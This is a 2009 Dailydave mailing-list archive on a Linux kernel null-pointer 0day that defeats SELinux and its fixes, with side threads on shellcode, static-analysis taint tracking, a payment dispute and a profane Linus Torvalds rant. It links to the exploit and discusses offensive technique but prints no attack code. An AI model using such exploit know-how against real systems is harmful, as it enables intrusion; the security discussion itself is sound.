Title says it all, exploit is at:
http://grsecurity.net/~spender/cheddar_bay.tgz

Everything is described and explained in the exploit.c file.
I exploit a bug that by looking at the source is unexploitable;
I defeat the null ptr dereference protection in the kernel on both systems with SELinux and those without.
I proceed to disable SELinux/AppArmor/LSM/auditing

Exploit works on both 32bit and 64bit kernels.

Links to videos of the exploit in action are present in the exploit code.

Greets to vendor-sec,
-Brad

From meissner at suse.de Mon Jul 20 06:01:47 2009
From: meissner at suse.de (Marcus Meissner)
Date: Mon, 20 Jul 2009 12:01:47 +0200
Subject: [Dailydave] [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable
In-Reply-To:
References:
Message-ID: <20090720100147.GB12598@suse.de>

On Fri, Jul 17, 2009 at 09:23:03AM +0200, yersinia wrote:
> FYI, a Spengler 0-day against Selinux null ptr dereference. Very Nice
> to see in action
>
> reference ( with youtube link )
>
> http://grsecurity.net/~spender/cheddar_bay.tgz

Yeah.

Some "minor" bugs and one larger one.

The Linux folks have meanwhile:

- Fixed the actual bug. ;) (CVE-2009-1897)
  Only affects 2.6.30,2.6.30.1.

  2.6.30.2 release soon.
- Added -fno-delete-null-pointers to their Makefiles

  Also in 2.6.30.2 and 2.

- fixed the personality - PER_CLEAR_ON_SETTID inheritance issue (CVE-2009-1895)
  to work around mmap_min_addr protection.
  Affects 2.6.23-2.6.30.1

  2.6.30.2 and 2.6.27.x releases soon.

I am not sure about the SELinux policy error he used to exploit the RHEL 5.? Beta.

Ciao, Marcus

From yersinia.spiros at gmail.com Mon Jul 20 08:32:58 2009
From: yersinia.spiros at gmail.com (yersinia)
Date: Mon, 20 Jul 2009 14:32:58 +0200
Subject: [Dailydave] [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable
In-Reply-To: <20090720100147.GB12598@suse.de>
References: <20090720100147.GB12598@suse.de>
Message-ID:

On Mon, Jul 20, 2009 at 12:01 PM, Marcus Meissner wrote:

> On Fri, Jul 17, 2009 at 09:23:03AM +0200, yersinia wrote:
> > FYI, a Spengler 0-day against Selinux null ptr dereference. Very Nice
> > to see in action
> >
> > reference ( with youtube link )
> >
> > http://grsecurity.net/~spender/cheddar_bay.tgz
>
> Yeah.
>
> Some "minor" bugs and one larger one.
>
> The Linux folks have meanwhile:
>
> - Fixed the actual bug. ;) (CVE-2009-1897)
>   Only affects 2.6.30,2.6.30.1.
>
>   2.6.30.2 release soon.
>
> - Added -fno-delete-null-pointers to their Makefiles
>
>   Also in 2.6.30.2 and 2.
>
> - fixed the personality - PER_CLEAR_ON_SETTID inheritance issue
>   (CVE-2009-1895)
>   to work around mmap_min_addr protection.
>   Affects 2.6.23-2.6.30.1
>
>   2.6.30.2 and 2.6.27.x releases soon.
>
> I am not sure about the SELinux policy error he used to
> exploit the RHEL 5.? Beta.
>
> Ciao, Marcus
>

This is the answer on this issue by James Morris, Selinux Kernel Developer
http://blog.namei.org/2009/07/18/a-brief-note-on-the-2630-kernel-null-pointer-vulnerability/

Ciao,
Elia
From rcs at cert.org Mon Jul 20 09:05:18 2009
From: rcs at cert.org (Robert Seacord)
Date: Mon, 20 Jul 2009 09:05:18 -0400
Subject: [Dailydave] As-if Infinitely Ranged Integer Model
In-Reply-To: <20090717005736.GA25295@grsecurity.net>
References: <20090717005736.GA25295@grsecurity.net>
Message-ID:

The Secure Coding Initiative at CERT has published a new Technical Note CMU/SEI-2009-TN-023 entitled "As-if Infinitely Ranged Integer Model".

Abstract: Integer overflow and wraparound are major causes of software vulnerabilities in the C and C++ programming languages. In this paper we present the as-if infinitely ranged (AIR) integer model, which provides a largely automated mechanism for eliminating integer overflow and integer truncation. The AIR integer model either produces a value equivalent to one that would have been obtained using infinitely ranged integers or results in a runtime constraint violation. Unlike previous integer models, AIR integers do not require precise traps, and consequently do not break or inhibit most existing optimizations.

Authors:
David Keaton (self)
Thomas Plum (Plum Hall Inc.)
Robert C. Seacord (SEI/CERT)
David Svoboda (SEI/CERT)
Alex Volkovitsky (SEI/CERT)
Timothy Wilson (SEI/CERT)

A PDF Download of this paper is available at:
http://www.sei.cmu.edu/publications/documents/09.reports/09tn023.html

I would be interested in hearing your opinions on this work, either publicly or privately. We are planning on continuing this project, as described by the report.

Thanks,
rCs

----
Robert C.
Seacord
Secure Coding Team Lead
CERT / Software Engineering Institute
Work: +1 412.268.7608
FAX: +1 412.268.6989

From spender at grsecurity.net Mon Jul 20 09:36:52 2009
From: spender at grsecurity.net (Brad Spengler)
Date: Mon, 20 Jul 2009 09:36:52 -0400
Subject: [Dailydave] [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable
In-Reply-To: <20090720100147.GB12598@suse.de>
References: <20090720100147.GB12598@suse.de>
Message-ID: <20090720133652.GA14021@grsecurity.net>

> I am not sure about the SELinux policy error he used to
> exploit the RHEL 5.? Beta.

It was a default RHEL 5.3 SELinux policy. The same vulnerability from the policy exists in Fedora 10 and 11. I haven't tested anything else, but I imagine lots more are vulnerable (and it doesn't matter what kernel you're running). There will be a CVE for this vulnerability as well.

(Really there should have been a CVE for the lack of -fno-delete-null-pointer-checks instead of pretending the only problem was /dev/net/tun. As the commit to add it showed (and at least 10 other commits to the kernel this weekend) lots of other code was affected, so someone not applying a fix for a CVE mentioning only /dev/net/tun because they don't have the code for /dev/net/tun compiled in, is going to be missing out on a number of fixes).

-Brad
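The check-after-dereference ordering that the -fno-delete-null-pointer-checks discussion above turns on, shown next to the corrected ordering. This is an added example, not part of the original messages and not kernel code; the struct names, function names and error value are hypothetical.

```c
/* Added illustration: hypothetical names, not code from the Linux kernel. */
#include <stddef.h>
#include <stdio.h>

#define ERR_NODEV (-19)   /* constructed error value for this example */

struct sock_stub { int readable; };
struct dev_stub  { struct sock_stub *sk; };

/*
 * Check-after-dereference. d->sk is read before d is tested, so the
 * compiler is allowed to assume d is non-NULL and, with GCC's
 * -fdelete-null-pointer-checks optimization active, remove the test.
 * Calling this with NULL is undefined behaviour; this example never does.
 */
int poll_check_after_deref(struct dev_stub *d)
{
    struct sock_stub *sk = d->sk;   /* dereference comes first */

    if (!d)                         /* may be treated as dead code */
        return ERR_NODEV;
    return sk ? sk->readable : ERR_NODEV;
}

/* Corrected ordering: validate the pointer, then read through it. */
int poll_check_before_deref(struct dev_stub *d)
{
    struct sock_stub *sk;

    if (!d)
        return ERR_NODEV;
    sk = d->sk;
    return sk ? sk->readable : ERR_NODEV;
}

int main(void)
{
    struct sock_stub s = { 1 };
    struct dev_stub ok = { &s };
    struct dev_stub no_sock = { NULL };

    printf("valid device, old ordering : %d\n", poll_check_after_deref(&ok));
    printf("valid device, new ordering : %d\n", poll_check_before_deref(&ok));
    printf("device without socket      : %d\n", poll_check_before_deref(&no_sock));
    printf("NULL device, new ordering  : %d\n", poll_check_before_deref(NULL));
    return 0;
}
```

Compiling the file to assembly with `gcc -O2 -S` and again with `gcc -O2 -fno-delete-null-pointer-checks -S` shows whether the `if (!d)` branch in the first function survives on a given compiler version.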
From yersinia.spiros at gmail.com Wed Jul 22 12:30:39 2009
From: yersinia.spiros at gmail.com (yersinia)
Date: Wed, 22 Jul 2009 18:30:39 +0200
Subject: [Dailydave] [oss-security] Re: [oss-security] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable
In-Reply-To:
References: <20090720100147.GB12598@suse.de> <20090720133652.GA14021@grsecurity.net>
Message-ID:

On Wed, Jul 22, 2009 at 5:04 PM, Todd Sabin wrote:

> spender at grsecurity.net (Brad Spengler) writes:
>
>> (Really there should have been a CVE for the lack of
>> -fno-delete-null-pointer-checks instead of pretending the only problem
>> was /dev/net/tun....
>
> Just as a side note, it seems like gcc is missing an option, to me.
> Okay, it can figure out that some NULL pointer checks seem to be
> useless, and either optimize them away or leave them in. What about
> issuing a warning?
>
> Where's -Wuseless-null-pointer-check?
>

Coverity opinion on this specific issue
http://blog.coverity.com/posts/general/would-you-like-to-know-about-0day-defects-months-in-advance

Regards

>
> Todd
>
> --
> Todd Sabin
>

From dave.aitel at gmail.com Fri Jul 24 01:07:55 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Fri, 24 Jul 2009 01:07:55 -0400
Subject: [Dailydave] 3am phone calls, intrigue? Say no more!
Message-ID:

From http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html:

"""
"The bug is actually much 'deeper' than most people realize," Flake wrote. "MS might have accidentally introduced security vulnerabilities into third party products."
I reached out to Flake for additional information, but he told me that shortly after he published that blog post he received a 3 a.m. phone call from Microsoft asking him please not to comment further.
"""

Someone needs to stop messing with the Flash bug and own WMP with this tonight!

-dave

From berendjanwever at gmail.com Sat Jul 25 08:24:01 2009
From: berendjanwever at gmail.com (Berend-Jan Wever)
Date: Sat, 25 Jul 2009 14:24:01 +0200
Subject: [Dailydave] So shellcode work is phun
In-Reply-To: <4e1ef3e50906300828l6f6d93bcm309ab369242f2a08@mail.gmail.com>
References: <4A45108B.5040901@crucialsecurity.com> <4A487051.3030102@redshift.com> <4e1ef3e50906300828l6f6d93bcm309ab369242f2a08@mail.gmail.com>
Message-ID: <3fa2f5bb0907250524k1e13e14fxf2fa4f8c6a274e05@mail.gmail.com>

If you're not paranoid about blowing stuff up and just want your shellcode to be both small and have a decent chance to work on Windows 7, try this:
http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/
(do let me know if that doesn't work on your machine!)

Cheers,
SkyLined

Berend-Jan Wever
http://skypher.com/SkyLined

On Tue, Jun 30, 2009 at 5:28 PM, Dave Aitel wrote:

> So today, in class, at the very end of the day, one of the students got his
> bindshell working. And he was connecting to it happily and quite pleased
> with himself and checking out his admin cmd.exe in taskmanager until we
> pointed out that he should probably bind to localhost instead of 0.0.0.0, at
> which point he got super paranoid. :>
>
> Anyways, one of the things we teach in class is to do error correction in
> your shellcode. That jne might cost you 2 bytes of space, but at least that
> 1/100th of a time when your bind() fails, you don't have to worry that you
> AVed some poor guy's lsass.
>
> That same thing is true for parsing the PEB and it's mighty linked lists.
> If you make assumptions about what order modules are loaded in, then things
> are going to blow up eventually.
> Probably not when you want them to.
>
> -dave
>
> On Mon, Jun 29, 2009 at 3:42 AM, Chris Eagle wrote:
>
>> Perhaps relevant:
>>
>> http://www.harmonysecurity.com/blog/2009/06/retrieving-kernel32s-base-address.html
>>
>> Chris
>>
>> Jared DeMott wrote:
>> > Dear Dave,
>> >
>> > Just for phun, I sat down to test a simple popup calc shellcode on
>> > Windows 7 RC today and it pooped. I verified that it worked on XP and
>> > Vista, and thought darn ... now I'm going to have to see why it failed
>> > on Windows 7 and email H D Moore. Anyone else seen this or am I on
>> > crack today?
>> >
>> > Cheers,
>> > Jared

From joanna at invisiblethingslab.com Sun Jul 26 09:41:08 2009
From: joanna at invisiblethingslab.com (Joanna Rutkowska)
Date: Sun, 26 Jul 2009 06:41:08 -0700
Subject: [Dailydave] Rockstar Wannabe
Message-ID: <4A6C5CF4.5080309@invisiblethingslab.com>

* 28/05/2009: The Day 0
* 23/06/2009: The 1st Reminder
* 29/06/2009: The 2nd Reminder
* 29/06/2009: Got an Answer: they cannot do it now, will do it later...
* 06/07/2009: The 3rd Reminder
* 13/07/2009: The 4th Reminder (expressed confusion about the lack of answer)
* 20/07/2009: The 5th Reminder
[Yes, you got it right, it's my task manager that keeps me reminding about sending those reminders every week!]
* 21/07/2009: Got an Answer: they are too busy now, though :(
* 21/07/2009: got pissed off a little bit:

Date: Tue, 21 Jul 2009 13:11:02 +0200
From: Joanna Rutkowska
To: Yuriko Kanamori, Dragos Ruiu
Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]]

Too bad Dragos can find time to update his twitter [1], but cannot even answer my email... So, disappointing :/

joanna.

[1] http://twitter.com/dragosr

Yuriko Kanamori wrote:
> Hi Joanna,
> We are in Japan for some work now till end of this month, and has been
> crazy busy.
> I will ask him to do it once we go back.
> Yuriko

* 23/07/2009: The Rockstar answered personally:

From: Dragos Ruiu
To: Joanna Rutkowska
Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]]
Date: Thu, 23 Jul 2009 17:26:40 -0700

That's because i have twitter on my phone here on trains in Tokyo, and I get about a half hour a day in front of my computer with my hectic meeting schedule..

I would also like to offer you a piece of advice that may serve you in other parts of your life:

Making me angry is unlikely to hasten my response, as a matter of fact it will do the exact opposite of what you desire. Factoring this into your dealings with others may improve responses to your requests.

Usually when someone complains, my response is to put their request back to the bottom of the task queue. Just because I'm a stubborn bastard. Have a nice day.

cheers,
--dr

P.S. your payment was sent out recently because i thought it might be a better use of my limited computer access than responding to your query - but international transfers usually take at least five days, so contact me if it doesn't show up by middle of next week because something went wrong.
Some additional facts: * The total amount of money we talk here is less then $500 USD Cheers, joanna. -- Joanna Rutkowska Founder/CEO Invisible Things Lab http://invisiblethingslab.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 227 bytes Desc: OpenPGP digital signature Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090726/196b939e/attachment.pgp From demonic.software at gmail.com Sun Jul 26 14:58:12 2009 From: demonic.software at gmail.com (Demonic Software) Date: Sun, 26 Jul 2009 13:58:12 -0500 Subject: [Dailydave] Rockstar Wannabe In-Reply-To: <4A6C5CF4.5080309@invisiblethingslab.com> References: <4A6C5CF4.5080309@invisiblethingslab.com> Message-ID: I am sure I will regret calling it like it is, but isn't it a little petty to spam a list about less than $500 and your personal dealings with people. Personally, I think this would be below a "Rock Star" of you're stature, but then I have learned in this business that there can be many surprises. Perhaps you should knock the chips off the shoulder and accept that people have priorities that don't include keeping you happy. Just saying.... -Adam On Sun, Jul 26, 2009 at 8:41 AM, Joanna Rutkowska wrote: > * 28/05/2009: The Day 0 > * 23/06/2009: The 1st Reminder > * 29/06/2009: The 2nd Reminder > * 29/06/2009: Got an Answer: they cannot do it now, will do it later... > * 06/07/2009: The 3rd Reminder > * 13/07/2009: The 4th Reminder (expressed confusion about the lack of answer) > * 20/07/2009: The 5th Reminder > [Yes, you got it right, it's my task manager that keeps me reminding about > sending those remainder every week!] 
> * 21/07/2009: Got an Answer: they are too busy now, though :( > *21/07/2009: got pissed off a little bit: > > > Date: Tue, 21 Jul 2009 13:11:02 +0200 > From: Joanna Rutkowska > To: Yuriko Kanamori , Dragos Ruiu > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > > Too bad Dragos can find time to update his twitter [1], but cannot even answer > my email... So, disappointing :/ > > joanna. > > [1] http://twitter.com/dragosr > > Yuriko Kanamori wrote: >> Hi Joanna, >> We are in Japan for some work now till end of this month, and has been >> crazy busy. >> I will ask him to do it once we go back. >> Yuriko > > > > * 23/07/2009: The Rockstar answered personally: > > > From: Dragos Ruiu > To: Joanna Rutkowska > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > Date: Thu, 23 Jul 2009 17:26:40 -0700 > > That's because i have twitter on my phone here on ?trains in Tokyo, and I get > about a half hour a day in front of my computer with my hectic meeting schedule.. > > I would also like to offer you a piece of advice that may serve you in other > parts of your life: > > Making me angry is unlikely to hasten my response, as a matter of fact it will > do the exact opposite of what you desire. Factoring this into your dealings with > others may improve responses to your requests. > > Usually when someone complains, my response is to put their request back to the > bottom of the task queue. Just because I'm a stubborn bastard. Have a nice day. > > cheers, > --dr > > P.S. your payment was sent out recently because i thought it might be a better > use of my limited computer access than responding to your query - but > international transfers usually take at least five days, so contact me if it > doesn't show up by middle of next week because something went wrong. > > > > Some additional facts: > * The total amount of money we talk here is less then $500 USD > > Cheers, > joanna. 
> -- > Joanna Rutkowska > Founder/CEO > Invisible Things Lab > http://invisiblethingslab.com/ > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From meddington at gmail.com Sun Jul 26 16:11:15 2009 From: meddington at gmail.com (Michael Eddington) Date: Sun, 26 Jul 2009 13:11:15 -0700 Subject: [Dailydave] Rockstar Wannabe In-Reply-To: <4A6C5CF4.5080309@invisiblethingslab.com> References: <4A6C5CF4.5080309@invisiblethingslab.com> Message-ID: <2db0cefa0907261311m4280c658nff0efc14ea7ba8dc@mail.gmail.com> Personally I've always found Dragos to be extremely generous in every dealing I've had with him. Something I definitely cannot say about some conferences or people. And while Dragos may operate on a schedule more chaotic then others, well, that's Dragos for yah :) If you are unhappy doing business with Dragos, then don't do any in the future. Perhaps you could also find a more appropriate forum for you complaints (/dev/null comes to mind). mike On Sun, Jul 26, 2009 at 6:41 AM, Joanna Rutkowska wrote: > * 28/05/2009: The Day 0 > * 23/06/2009: The 1st Reminder > * 29/06/2009: The 2nd Reminder > * 29/06/2009: Got an Answer: they cannot do it now, will do it later... > * 06/07/2009: The 3rd Reminder > * 13/07/2009: The 4th Reminder (expressed confusion about the lack of answer) > * 20/07/2009: The 5th Reminder > [Yes, you got it right, it's my task manager that keeps me reminding about > sending those remainder every week!] > * 21/07/2009: Got an Answer: they are too busy now, though :( > *21/07/2009: got pissed off a little bit: > > > Date: Tue, 21 Jul 2009 13:11:02 +0200 > From: Joanna Rutkowska > To: Yuriko Kanamori , Dragos Ruiu > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > > Too bad Dragos can find time to update his twitter [1], but cannot even answer > my email... So, disappointing :/ > > joanna. 
> > [1] http://twitter.com/dragosr > > Yuriko Kanamori wrote: >> Hi Joanna, >> We are in Japan for some work now till end of this month, and has been >> crazy busy. >> I will ask him to do it once we go back. >> Yuriko > > > > * 23/07/2009: The Rockstar answered personally: > > > From: Dragos Ruiu > To: Joanna Rutkowska > Subject: Re: [Fwd: [Fwd: Re: [Fwd: [Fwd: ticket invoice and wire details]]]] > Date: Thu, 23 Jul 2009 17:26:40 -0700 > > That's because i have twitter on my phone here on ?trains in Tokyo, and I get > about a half hour a day in front of my computer with my hectic meeting schedule.. > > I would also like to offer you a piece of advice that may serve you in other > parts of your life: > > Making me angry is unlikely to hasten my response, as a matter of fact it will > do the exact opposite of what you desire. Factoring this into your dealings with > others may improve responses to your requests. > > Usually when someone complains, my response is to put their request back to the > bottom of the task queue. Just because I'm a stubborn bastard. Have a nice day. > > cheers, > --dr > > P.S. your payment was sent out recently because i thought it might be a better > use of my limited computer access than responding to your query - but > international transfers usually take at least five days, so contact me if it > doesn't show up by middle of next week because something went wrong. > > > > Some additional facts: > * The total amount of money we talk here is less then $500 USD > > Cheers, > joanna. 
> --
> Joanna Rutkowska
> Founder/CEO
> Invisible Things Lab
> http://invisiblethingslab.com/

From dave at immunityinc.com Mon Jul 27 16:05:41 2009
From: dave at immunityinc.com (dave)
Date: Mon, 27 Jul 2009 16:05:41 -0400
Subject: [Dailydave] Static Analysis part 5
Message-ID: <4A6E0895.7020600@immunityinc.com>

If you haven't read it yet (and you like to read things), this is worth reading:

http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf

There's a lot of meta-questions here, like "What sorts of vulnerabilities can automated techniques really find?" Scalability is hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the paper asks.

Many people don't see why it's hard to do static analysis automatically, which I think is always worth thinking about.

For example, recently I was at a conference looking at a vendor's implementation of the traditional "data-flow-then-alert-on-tainted-data" algorithm. (As opposed to the "solve-massive-equation-to-understand-data-constraints" style).[1]

We were looking at PHP, and I couldn't for the life of me figure out why the system was alerting on a particular code path. I will reproduce it here in python, since my PHP is weak.

import os

d = {}  # DEFINE dictionary
d["HI"] = TAINTED_USER_DATA  # insert some tainted data to it, whole dictionary is tainted now.
# stuff goes here that is not relevant (we think)
os.system(d["BYE"])  # ALERT!

It turns out the analysis tool tainted the whole dictionary if any tainted data was inserted into it, because all the other solutions for that are...insanely complex. Maybe one of the static analysis gurus on the list knows of the best way to solve that particular problem and wants to share.
(Or maybe there isn't a solution for that problem, and no one wants to point that out either? :>)

-dave

[1] Scanner Pong's rules are as follows. You must use the test programs the vendor brings with them to demonstrate their static analysis tool. For each vulnerability you look at you lose 1 point. For each vulnerability you look at that you show to be a false positive, you get 2 points. For each vulnerability you look at where the tool has missed an interesting vulnerability within 30 lines of code you get 5 points.

From version5 at gmail.com Mon Jul 27 18:06:35 2009
From: version5 at gmail.com (nnp)
Date: Mon, 27 Jul 2009 23:06:35 +0100
Subject: [Dailydave] Static Analysis part 5
In-Reply-To: <4A6E0895.7020600@immunityinc.com>
References: <4A6E0895.7020600@immunityinc.com>
Message-ID: <28749c0e0907271506t78775b66g1591ea15aad68ebd@mail.gmail.com>

Err...so they had a PHP specific source code analysis tool *without* support for default language structures (or at least, without useful support)? I'm assuming they parse the source into some sort of AST and then do their analysis on that, so the only justification I could see would be that their AST format didn't have support for something like a dictionary, which seems pretty odd.

On the topic of automated analysis, check this out http://klee.llvm.org/. I only just found out it was open source (via the RE reddit [1]). Their paper is linked from that site and it's pretty good. They take the "solve-massive-equation-to-understand-data-constraints" style approach.
[1] http://www.reddit.com/r/ReverseEngineering/comments/94xxg/klee_unassisted_and_automatic_generation_of/ On Mon, Jul 27, 2009 at 9:05 PM, dave wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > If you haven't read it yet (and you like to read things), this is worth > reading: > > http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf > > There's a lot of meta-questions here, like "What sorts of > vulnerabilities can automated techniques really find?" Scalability is > hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the > paper asks. > > Many people don't see why it's hard to do static analysis automatically, > which I think is always worth thinking about. > > For example, recently I was at a conference looking at a vendor's > implementation of the traditional "data-flow-then-alert-on-tainted-data" > algorithm. (As opposed to the > "solve-massive-equation-to-understand-data-constraints" style).[1] > > We were looking at PHP, and I couldn't for the life of me figure out why > the system was alerting on a particular code path. I will reproduce it > here in python, since my PHP is weak. > > d={} //DEFINE dictionary > d["HI"]=TAINTED_USER_DATA; //insert some tainted data to it, whole > dictionary is tainted now. > #stuff goes here that is not relevant (we think) > os.system(d["BYE"]) //ALERT! > > It turns out the analysis tool tainted the whole dictionary if any > tainted data was inserted into it, because all the other solutions for > that are...insanely complex. Maybe one of the static analysis guru's on > the list knows of the best way to solve that particular problem and > wants to share. (Or maybe there isn't a solution for that problem, and > no one wants to point that out either? :>) > > - -dave > [1] Scanner Pong's rules are as follows. You must use the test programs > the vendor brings with them to demonstrate their static analysis tool. > For each vulnerability you look at you lose 1 point. 
For each
> vulnerability you look at that you show to be a false positive, you get
> 2 points. For each vulnerability you look at where the tool has missed
> an interesting vulnerability within 30 lines of code you get 5 points.

From pageexec at freemail.hu Mon Jul 27 19:09:40 2009
From: pageexec at freemail.hu (pageexec at freemail.hu)
Date: Tue, 28 Jul 2009 01:09:40 +0200
Subject: [Dailydave] Security people are leaches. [sic]
Message-ID: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu>

really. or at least according to one Linus Torvalds, who also happens to be the primary reason for not one, but two! of this year's pwnie nominations for lamest vendor response and most epic FAIL. apparently the fundamental issue he cannot understand is that if they don't know what bugs are security issues, maybe they should find people who do. or maybe bother reading those static checker reports that point them out. just a thought.

also one cannot help but smile at the irony of divineint (put in charge of security at RH, no less ;) asking for more proper disclosure. how times change ;).

also i guess exploit writers would heartily disagree with the notion that there's no difference between bugs and security bugs :P. anyway, without further ado, here's the latest masterpiece:

On Sun, 19 Jul 2009, Eugene Teo wrote:
>
> If the upstream development community can start doing their part by
> differentiating normal bug fixes to the security ones, I think most of
> us will benefit from it.
Ok, so this is a perfect example of the kind of IDIOTIC blathering that I hate to hear from security people.

Quite frankly, people who state things like that ARE FUCKING MORONS.

I'm sorry, but it's true. Learn it. Think about it. Deeply, and long.

This whole security exploit is a prime example of exactly why anybody who says something stupid like that is so stupid and so WRONG.

Look at the bug that caused it. Look at the fix. Think about it. When the fix was committed, nobody thought it was a security bugfix.

Really.

If you cannot understand this FUNDAMENTAL issue, I don't know what can make you do so. I absolutely despise most security people, because they are idiots who do not understand development. They are idiots who do not understand basic facts. They are idiots, who think the world is some kind of black-and-white place where you can sort bugs into 'security' and 'not security'.

So here's a few simple rules:

 - people who argue for full disclosure are wrong

 - people who argue for hiding things and vendor-sec are wrong

 - people who think that there are "bugs" and "security bugs" are fundamentally wrong, and misguided, and will always do the wrong thing.

The fact is, bugs are bugs. We don't know which of them are security issues. We all make mistakes, and we _fix_ the mistakes, and some of the fixes turn out to have way more subtle interactions than people even realized!

So you can ask developers to "always think of all the possible issues", and you will be left with developers who won't have time or motivation to actually do any real work. And they'll _still_ miss some subtle issue, and they'll _still_ write code that has bugs.

So how about people face REALITY instead of talking about idiotic platitudes like people should be "differentiating normal bug fixes to the security ones"? And it _is_ a platitude: it's something that sounds "obviously correct", but it's at the same time clearly ignoring the fact that reality is complicated.
So f*ck me, shut up about idiotic things like that already!

This whole bug really is a _prime_ example of how the bugfix was not at all clearly a security fix at all, even though it obviously was a big deal. And a security person who cannot understand that is not a security person at all - he's just a f*cking poser.

This is why I detest security lists. Lots of posturing and platitudes. And look at who actually did the real work: a regular developer, and a regular maintainer, neither of whom were thinking in terms of security.

Security people are leaches. The real heroes are the people who do development. The last thing security people should do is to ask the people who do the REAL WORK to do more.

                        Linus

From halvar at gmx.de Mon Jul 27 23:40:23 2009
From: halvar at gmx.de (Halvar Flake)
Date: 28 Jul 2009 05:40:23 +0200
Subject: [Dailydave] Static Analysis part 5
In-Reply-To: <4A6E0895.7020600@immunityinc.com>
References: <4A6E0895.7020600@immunityinc.com>
Message-ID: <4A6E7327.1030805@gmx.de>

Tainting / untainting is generally a difficult topic.

- If I calculate the length of a tainted string, is the result tainted?
- If I check some boundaries on this string, is the result untainted?
- What if the boundaries I checked for are wrong?

Can of worms, difficult to solve.

Cheers,
Halvar

dave wrote:
> If you haven't read it yet (and you like to read things), this is worth
> reading:
>
> http://samate.nist.gov/docs/NIST_Special_Publication_500-279.pdf
>
> There's a lot of meta-questions here, like "What sorts of
> vulnerabilities can automated techniques really find?" Scalability is
> hard too. "Can we look at 4500 buffer overflow bugs to triage them?" the
> paper asks.
>
> Many people don't see why it's hard to do static analysis automatically,
> which I think is always worth thinking about.
> > For example, recently I was at a conference looking at a vendor's > implementation of the traditional "data-flow-then-alert-on-tainted-data" > algorithm. (As opposed to the > "solve-massive-equation-to-understand-data-constraints" style).[1] > > We were looking at PHP, and I couldn't for the life of me figure out why > the system was alerting on a particular code path. I will reproduce it > here in python, since my PHP is weak. > > d={} //DEFINE dictionary > d["HI"]=TAINTED_USER_DATA; //insert some tainted data to it, whole > dictionary is tainted now. > #stuff goes here that is not relevant (we think) > os.system(d["BYE"]) //ALERT! > > It turns out the analysis tool tainted the whole dictionary if any > tainted data was inserted into it, because all the other solutions for > that are...insanely complex. Maybe one of the static analysis guru's on > the list knows of the best way to solve that particular problem and > wants to share. (Or maybe there isn't a solution for that problem, and > no one wants to point that out either? :>) > > -dave > [1] Scanner Pong's rules are as follows. You must use the test programs > the vendor brings with them to demonstrate their static analysis tool. > For each vulnerability you look at you lose 1 point. For each > vulnerability you look at that you show to be a false positive, you get > 2 points. For each vulnerability you look at where the tool has missed > an interesting vulnerability within 30 lines of code you get 5 points. _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From yersinia.spiros at gmail.com Tue Jul 28 07:44:38 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Tue, 28 Jul 2009 13:44:38 +0200 Subject: [Dailydave] Security people are leaches. 
[sic] In-Reply-To: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> References: <4A6E33B4.30180.252B77B7@pageexec.freemail.hu> Message-ID: FWIW, also "insane" http://kerneltrap.org/mailarchive/linux-kernel/2007/10/1/326479/thread#mid-326479 BTW, personally i agreed on the motivations exposed from Linus in the two thread. But is necessary to look in depth on the discussion. Regards On Tue, Jul 28, 2009 at 1:09 AM, wrote: > really. or at least according to one Linus Torvalds, who also happens to be the > primary reason for not one, but two! of this year's pwnie nominations for lamest > vendor response and most epic FAIL. apparently the fundamental issue he cannot > understand is that if they don't know what bugs are security issues, maybe they > should find people who do. or maybe bother reading those static checker reports > that point them out. just a thought. > > also one cannot help but smile at the irony of divineint (put in charge of security > at RH, no less ;) asking for more proper disclosure. how times change ;). > > also i guess exploit writers would heartily disagree with the notion that there's > no difference between bugs and security bugs :P. anyway, without further ado, here's > the latest masterpiece: > > > On Sun, 19 Jul 2009, Eugene Teo wrote: >> >> If the upstream development community can start doing their part by >> differentiating normal bug fixes to the security ones, I think most of >> us will benefit from it. > > Ok, so this is a perfect example of the kind of IDIOTIC blathering that I > hate to hear from security people. > > Quite frankly, people who state things like that ARE FUCKING MORONS. > > I'm sorry, but it's true. Learn it. Think about it. Deeply, and long. > > This who security exploit is a prime example of exactly why anybody who > says something stupid like that is so stupid and so WRONG. > > Look at the bug that caused it. Look at the fix. Think about it. When the > fix was committed, nobody thought it was a security bugfix. 
